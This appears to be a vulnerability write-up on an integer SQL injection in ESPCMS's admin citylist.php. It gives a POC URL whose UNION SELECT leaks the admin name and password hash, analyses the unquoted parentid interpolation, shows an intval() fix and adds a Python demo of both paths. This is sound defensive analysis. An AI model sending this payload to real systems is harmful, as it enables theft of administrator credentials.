ESPCMS /adminsoft/control/citylist.php Integer SQL Injection Vulnerability

    catalog

    1. Vulnerability description
    2. Trigger conditions
    3. Affected versions
    4. Vulnerable code analysis
    5. Defense
    6. Offensive/defensive reflections

    1. Vulnerability description

    Relevant Link:
    2. Trigger conditions

    0x1: POC

    http://127.0.0.1/ESPCMSV6/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1%20UNION%20select%201,2,concat%28name,0x7c,password%29,4,5%20FROM%20espcms_v6.espcms_admin_member
    http://127.0.0.1/ESPCMSV6/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1 UNION select 1,2,concat(name,0x7c,password),4,5 FROM espcms_v6.espcms_admin_member

    The two URLs are the same request, URL-encoded and decoded. parentid=-1 matches no real city row, so the UNION row is the only output; its third column (concat(name,0x7c,password), where 0x7c is the MySQL hex literal for '|') lands in the cityname position that the handler echoes into the <option> list, leaking the admin name and password hash. The payload contains no quote characters, which is exactly why the addslashes-style escaping described below does not stop it.


    3. Affected versions
    4. Vulnerable code analysis

    /adminsoft/control/citylist.php

    class important extends connector {

        // PHP4-style constructor, as in the original ESPCMS code
        function important() {
            $this->softbase(true);
        }

        function oncitylist() {
            // receive the external parameter parentid (GET first, POST as fallback)
            $parentid = $this->fun->accept('parentid', 'R');

            // empty() treats "" and "0" as empty, so those become 1; anything else passes through untouched
            $parentid = empty($parentid) ? 1 : $parentid;
            $verid = $this->fun->accept('verid', 'R');
            $verid = empty($verid) ? 0 : $verid;
            $db_table = db_prefix . 'city';
            // the unquoted, uncast parentid is interpolated straight into the statement
            $sql = "select * from $db_table where parentid=$parentid";

            // debugging line: dumps the assembled statement and stops; remove it to reach the query below
            die(var_dump($sql));

            $list = '';
            $rs = $this->db->query($sql);
            for ($i = 0; $rsList = $this->db->fetch_array($rs); $i++) {
                // whatever ends up in column 3 (cityname) is echoed back to the caller
                if ($verid == $rsList['id']) {
                    $list .= '<option selected value="' . $rsList['id'] . '">' . $rsList['cityname'] . '</option>';
                } else {
                    $list .= '<option value="' . $rsList['id'] . '">' . $rsList['cityname'] . '</option>';
                }
            }
            exit($list);
        }

    }

    Following $parentid = $this->fun->accept('parentid', 'R'); into
    /public/class_function.php

    function accept($k, $var = 'R', $htmlcode = true, $rehtml = false) {
        switch ($var) {
            case 'G':
                $var = &$_GET;
                break;
            case 'P':
                $var = &$_POST;
                break;
            case 'C':
                $var = &$_COOKIE;
                break;
            case 'R':
                // 'R' reads $_GET first and falls back to $_POST when the GET value is empty
                $var = &$_GET;
                if (empty($var[$k])) {
                    $var = &$_POST;
                }
                break;
        }
        // the input is escaped with addslashes-style escaping (quotes, backslashes, NUL),
        // which has no effect on an integer-context injection: the payload needs no quotes
        $putvalue = isset($var[$k]) ? $this->daddslashes($var[$k], 0) : NULL;

        // by default the value is additionally HTML-decoded before being returned
        return $htmlcode ? ($rehtml ? $this->preg_htmldecode($putvalue) : $this->htmldecode($putvalue)) : $putvalue;
    }

    Relevant Link:

    http://www.wooyun.org/bugs/wooyun-2015-0163605


    5. Defense

    /adminsoft/control/citylist.php

    class important extends connector {

        function important() {
            $this->softbase(true);
        }

        function oncitylist() {
            // receive the external parameter parentid
            $parentid = $this->fun->accept('parentid', 'R');
            /* fix: force the value to an integer before it reaches the statement */
            $parentid = intval($parentid);
            /* end of fix */

            $parentid = empty($parentid) ? 1 : $parentid;
            $verid = $this->fun->accept('verid', 'R');
            $verid = empty($verid) ? 0 : $verid;
            $db_table = db_prefix . 'city';
            $sql = "select * from $db_table where parentid=$parentid";

            // the debugging die(var_dump($sql)) from the analysis above is not part of the fix

            $list = '';
            $rs = $this->db->query($sql);
            for ($i = 0; $rsList = $this->db->fetch_array($rs); $i++) {
                if ($verid == $rsList['id']) {
                    $list .= '<option selected value="' . $rsList['id'] . '">' . $rsList['cityname'] . '</option>';
                } else {
                    $list .= '<option value="' . $rsList['id'] . '">' . $rsList['cityname'] . '</option>';
                }
            }
            exit($list);
        }

    }
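
    The following is an added example, not code from the original post or from ESPCMS. It replays the code analysis in section 4 and the intval() fix in section 5 against an in-memory SQLite database: the query is assembled the way oncitylist() does it, first without and then with the integer cast, and the POC payload is run through both. The table layout (five columns, cityname in the third position) is only what the POC implies and is constructed here; it is not the real ESPCMS schema. MySQL's concat(name,0x7c,password) is rewritten as name||char(124)||password because SQLite has no concat() and treats 0x7c as an integer; the point, a payload with no quote characters, is unchanged. daddslashes and php_intval are small re-implementations of the PHP behaviour, also assumptions of this example.

```python
import re
import sqlite3

# Constructed payload: the page's POC with MySQL-only syntax translated to SQLite.
PAYLOAD = "-1 UNION select 1,2,name||char(124)||password,4,5 FROM espcms_admin_member"


def daddslashes(value: str) -> str:
    """Approximates ESPCMS daddslashes() / PHP addslashes(): backslash-escapes
    quotes, backslashes and NUL. The PAYLOAD contains none of these."""
    return re.sub(r"([\\'\"\x00])", r"\\\1", value)


def php_intval(value: str) -> int:
    """PHP intval() on a string: leading optional sign and digits, otherwise 0."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


def build_sql_vulnerable(parentid_raw: str) -> str:
    """Mirrors the original oncitylist(): escaped, but neither quoted nor cast."""
    parentid = daddslashes(parentid_raw)
    parentid = "1" if parentid in ("", "0") else parentid  # PHP empty() on a string
    return f"select * from espcms_city where parentid={parentid}"


def build_sql_fixed(parentid_raw: str) -> str:
    """Mirrors the patched oncitylist(): intval() before interpolation, so only
    the leading '-1' of the payload survives."""
    parentid = php_intval(daddslashes(parentid_raw))
    parentid = 1 if parentid == 0 else parentid  # PHP empty() on an integer
    return f"select * from espcms_city where parentid={parentid}"


def setup_db() -> sqlite3.Connection:
    """Constructed sample data standing in for espcms_city / espcms_admin_member."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE espcms_city (id INTEGER, parentid INTEGER, cityname TEXT,
                                  pinyin TEXT, sort INTEGER);
        INSERT INTO espcms_city VALUES (1, 0, 'Beijing', 'beijing', 1),
                                       (2, 1, 'Haidian', 'haidian', 1),
                                       (3, 1, 'Chaoyang', 'chaoyang', 2);
        CREATE TABLE espcms_admin_member (id INTEGER, name TEXT, password TEXT);
        INSERT INTO espcms_admin_member VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    conn.row_factory = sqlite3.Row
    return conn


def citylist(conn: sqlite3.Connection, sql: str):
    """What the loop in oncitylist() would echo: (id, cityname) per row. In a UNION
    the column names come from the first SELECT, so the payload's third column is
    read back as 'cityname'. A syntax error (what a quoted payload produces after
    addslashes) yields None instead of rows."""
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None
    return [(row["id"], row["cityname"]) for row in rows]


def citylist_parameterized(conn: sqlite3.Connection, parentid_raw: str):
    """Stronger form of the fix: cast and bind as a parameter instead of interpolating."""
    parentid = php_intval(parentid_raw)
    parentid = 1 if parentid == 0 else parentid
    rows = conn.execute("select * from espcms_city where parentid=?", (parentid,)).fetchall()
    return [(row["id"], row["cityname"]) for row in rows]


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable:", build_sql_vulnerable(PAYLOAD))
    print("  ->", citylist(db, build_sql_vulnerable(PAYLOAD)))
    print("fixed:     ", build_sql_fixed(PAYLOAD))
    print("  ->", citylist(db, build_sql_fixed(PAYLOAD)))
```

    Run it and the vulnerable path returns a single "city" whose name is admin|<password hash>, while the intval() path reduces the same input to parentid=-1 and returns nothing. The example also shows the limit of the original escaping: a quoted payload such as 1' or '1'='1 is mangled by daddslashes into a syntax error, which is why the author's POC avoids quotes entirely.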


    6. Offensive/defensive reflections

    Copyright (c) 2015 LittleHann All rights reserved

    Original article: https://www.cnblogs.com/LittleHann/p/5083481.html